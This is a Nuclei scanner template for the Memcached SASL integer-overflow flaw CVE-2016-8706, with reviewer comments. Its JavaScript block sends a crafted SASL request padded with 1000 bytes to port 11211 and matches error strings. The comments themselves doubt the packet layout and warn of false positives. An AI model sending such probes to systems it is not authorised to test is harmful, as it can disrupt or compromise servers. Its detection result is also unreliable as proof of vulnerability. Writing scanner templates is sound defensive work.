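# Nuclei template (javascript protocol) for CVE-2016-8706 in Memcached.
# It opens one TCP connection to the target's Memcached port, sends a single
# binary-protocol request whose first two bytes are 0x80 (request magic) and
# 0x21 (SASL Auth opcode), and evaluates the text of the reply.
# This is an active probe, not a passive banner or version check.
id: CVE-2016-8706

info:
  name: Memcached Server SASL Authentication - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
  impact: |
    Attackers can trigger heap overflow in the SASL authentication function, potentially achieving remote code execution on Memcached servers.
  # The fixed release is not named here; take the exact version from the
  # vendor/distribution advisories under `reference`. Independently of
  # patching, keeping port 11211 reachable only from trusted application hosts
  # removes the unauthenticated network path this check relies on.
  remediation: |
    Upgrade Memcached to a version later than affected releases that properly handles integer overflow in SASL authentication.
  reference:
    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
    - http://rhn.redhat.com/errata/RHSA-2016-2819.html
    - http://www.debian.org/security/2016/dsa-3704
    - http://www.securitytracker.com/id/1037333
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2016-8706
    cwe-id: CWE-190
    epss-score: 0.51793
    epss-percentile: 0.97952
    cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: memcached
    product: memcached
    # Key was misspelled `verfied`, so tooling that reads `verified` would not
    # have seen the flag.
    verified: true
  tags: cve,cve2016,rce,js,memcached,vuln

javascript:
  # Skip the probe when the port is closed.
  - pre-condition: |
      isPortOpen(Host,Port);
    # Builds the request in a byte buffer: magic + opcode, the string 'stats',
    # a big-endian 16-bit 32, a big-endian 32-bit 1, then 1000 'A' bytes. The
    # value of the final expression (the received string) is what the matchers
    # below evaluate.
    # NOTE(review): `cmd` is written immediately after the opcode, i.e. inside
    # the fixed-size binary-protocol request header rather than after it.
    # Confirm this frame layout is intended before trusting a result.
    code: |
      let packet = bytes.NewBuffer();
      packet.Write(new Uint8Array([0x80, 0x21]))
      let cmd = 'stats'
      packet.WriteString(cmd)
      packet.Pack("!H", [32]);
      packet.Pack("!I", [1]);
      let buzz = Array(1000).fill("A").join('');
      packet.WriteString(buzz)
      const c = require("nuclei/net");
      let conn = c.Open('tcp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      conn.RecvString();
    args:
      Host: "{{Host}}"
      Port: 11211

    # Both conditions must hold: the reply contains "Invalid arguments" and
    # does not contain "Auth failure".
    # NOTE(review): "Invalid arguments" looks like a generic binary-protocol
    # error string, so this pair may also fire on patched servers. TODO confirm
    # against a fixed build. Treat a hit as a lead and verify the installed
    # Memcached version against the advisories before reporting it.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Invalid arguments"

      - type: word
        words:
          - "Auth failure"
        negative: true
# NOTE(review): the digest below presumably signs the template content, so it
# has to be regenerated after any edit to this file, including the metadata
# key fix above.
# digest: 4a0a00473045022100cfc14488925c69b136a8e72f0d01e9c3f96243666abc3757ed6fb29c414fe3f50220434c5a9387f01bb7011ca1782eaa9f9cfb48e67979371b005012bb356ff6a963:922c64590222798bb761d5b6d8e72950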